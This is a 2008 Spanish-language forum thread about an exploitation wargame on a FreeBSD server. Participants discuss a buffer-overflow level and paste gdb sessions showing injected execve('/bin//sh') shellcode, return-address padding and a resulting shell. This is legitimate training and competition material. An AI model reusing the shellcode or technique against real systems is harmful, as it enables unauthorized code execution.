Torneo de explotacion de servidores

Iniciado por sirdarckcat, 15 Noviembre 2008, 17:24 PM

0 Miembros y 6 Visitantes están viendo este tema.

blackngel

Jejeje...

AVERIGUADO! Creo que ha sido de las pruebas que más
me ha reconfortado! Desde luego esta si que me encantaría
documentarla, tiene mucha miga ;)

Repito entonces: ¿Habrá puntos por documentar pruebas
individuales?

Bueno, a ver que toca ahora xD ¿Format String?

Un abrazo!

AlbertoBSD

Que bien que la aigas pasado :D veo que estoy cumpliendo mi objetivo!!

Cita de: blackngel en 12 Diciembre 2008, 18:17 PM
Repito entonces: ¿Habrá puntos por documentar pruebas
individuales?

Se lo comenta ayer a sdc, pero en realidad me fui a dormir por que tenia mucho sueño :xD, me imagino que si va a ver meritos, puntos no se, y menos lo de la cuenta @elhacker.net pero pues ya estas por buen camino :) en un rato mas y pasa el reto completo.

Cita de: blackngel en 12 Diciembre 2008, 18:17 PM
Bueno, a ver que toca ahora xD ¿Format String?

No exactamente un FS, pero el titulo dice dejavu creo que me recuerda a la pelicula de the matrix:


http://www.youtube.com/watch?v=z_KmNZNT5xw


Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

blackngel

Bien :)

Veremos que se puede hacer, aunque lo de acabarlo va estar
difícil.

Dos cuestiones:

- ¿Diferencia entre méritos y puntos?

- Comentar que es una pena no disponer de herramientas
  como "strace" y/o "ltrace". ¿Es una decisón deliberada?

Saludos!

AlbertoBSD

#123
Hola que tal !!

:¬¬

Citar%man truss

Wikipedia
http://es.wikipedia.org/wiki/Strace
Citarstrace es una utilidad de comprobación de errores en el sistema operativo GNU/Linux que sirve para monitorizar las llamadas al sistema usadas por un determinado programa y todas las señales que éste recibe, es similar a la aplicación truss disponible en otros sistemas Unix. Esto es posible por una característica del núcleo linux llamada ptrace.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

blackngel

Ok ok...

Cuanto se aprende... :p

Pero ahora ser buenos. Alguna pista para la 3ª prueba?
Me ocurren cosas muy raras que no habia visto nunca!

Bye!

AlbertoBSD

Hola que tal nuevamente :D veo que estas entretenido :xD  :rolleyes:


Cita de: blackngel en 12 Diciembre 2008, 21:04 PM
Me ocurren cosas muy raras que no habia visto nunca!

Lo mismo me dije hace unos meses :)

pues la pista es que es un dejavu!!  :¬¬ No es broma

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

blackngel

Te pido un favor:

He creado un exploit ex1.c en mi directorio, y consigo una
shell "sh" si lo ejecuto desde "gdb" con "run 1029 5".

Salen 2 mensajes de SIGTRAP y debes escribir "c" 2 veces.
Luego tienes la shell pero no tengo permisos para hacer nada
mas.

Desde fuera y con los mismos parametros ($./ex1 1029 5) solo
consigo un "bus error".

No entiendo que demonios pasa, cuando vi la SHELL ya estaba
saltando de alegria :) y ahora nada!

Puedes echarle un vistazo y probarlo tu?

Muchas gracias! Un abrazo!

AlbertoBSD

Bueno lo he probado y pues:

Citar
%gdb ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfec58  Offset: 0x5   Return: 0xbfbfec53

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:

1ÀPh//shh/binãPTSP°;Íì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿

Program received signal SIGBUS, Bus error.
0xbfbfec54 in ?? ()
(gdb) c
Continuing.

Program terminated with signal SIGBUS, Bus error.

No dudo que te haya funcionado, sin embargo este dejavu es un dejavu :P... pero la matrix cambio algo  >:D


Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

blackngel

CitarC:/Users/NikiSanders/Desktop>gdb ./ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfebf8  Offset: 0x5   Return: 0xbfbfebf3

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:

����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PTSP�;̀뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿

Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x088643e0 in _rtld_thread_init () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
$ id
uid=7027(NikiSanders) gid=6001(warusers) groups=6001(warusers),5000(warzone),5001(warzone1),5002(warzone2)
$ exit

Program exited normally.
(gdb)

AlbertoBSD

A ya me acorde por que suele suceder eso, bueno resulta que el valor del get_esp cambia dependiendo de la cantidad de procesos que exista en memoria, tal vez por eso no me salio.

Muchas veces por ejemplo hago cosas asi con modo grafico  y pues el offset del exploit es uno, y despues lo hago en modo terminal y pues otro tanto.

Voy a ver lo del exploit y te veo que pasa.

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW